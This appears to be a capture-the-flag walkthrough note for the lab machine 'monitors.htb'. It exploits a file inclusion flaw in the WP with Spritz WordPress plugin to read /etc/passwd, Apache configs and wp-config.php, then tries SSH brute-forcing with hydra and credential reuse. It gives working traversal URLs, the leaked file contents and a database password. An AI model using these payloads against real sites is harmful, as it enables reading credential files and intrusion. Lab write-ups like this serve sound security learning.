4 wp with spritz exploit

Using https://www.exploit-db.com/exploits/44544

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
| also works without traversal: http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

# LFI works, RFI fails; a requested .php file is shown as source, not executed.
# can't figure out where wp-config.php is
| tried /var/www/html; /var/ww/; /var/www/html/monitors/ and lot of combinations

# reading the Apache config file to get a better idea of the layout
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/apache2/apache2.conf
[truncated]
<Directory />
	Options FollowSymLinks
	AllowOverride None
	Require all denied
</Directory>
<Directory /usr/share>
	AllowOverride None
	Require all granted
</Directory>
<Directory /var/www/>
	Options Indexes FollowSymLinks
	AllowOverride None
	Require all granted
</Directory>
#<Directory /srv/>
#	Options Indexes FollowSymLinks
#	AllowOverride None
#	Require all granted
#</Directory>

<FilesMatch "^\.ht">
	Require all denied
</FilesMatch>

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# reading the vhost config file to get the DocumentRoot / directory information
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/apache2/sites-available/000-default.conf
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf
<VirtualHost *:80>
	ServerAdmin admin@monitors.htb
	DocumentRoot /var/www/html
	Redirect 403 /
	ErrorDocument 403 "Sorry, direct IP access is not allowed. <br><br>If you are having issues accessing the site then contact the website administrator: admin@monitors.htb"
	UseCanonicalName Off
</VirtualHost>

# there is a new subdomain: cacti-admin.monitors.htb
| added it to /etc/hosts

# we know the DocumentRoot is /var/www/html, but wp-config.php still does not load from there
| tried the php b64 wrapper; there is a directory in the path whose name is not known
| using directory traversal relative to the plugin's own location to reach wp-config.php

# three directories back (from wp-content/plugins/wp-with-spritz/ up to the WordPress root), which makes sense
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );

# possible usernames
admin
wpadmin
marcus

# password (from wp-config.php, DB_PASSWORD)
BestAdministrator@2020!

# hydra SSH brute-force with the usernames above > nothing
# tried all credential combinations on wp-login > nothing

# exploring the new subdomain
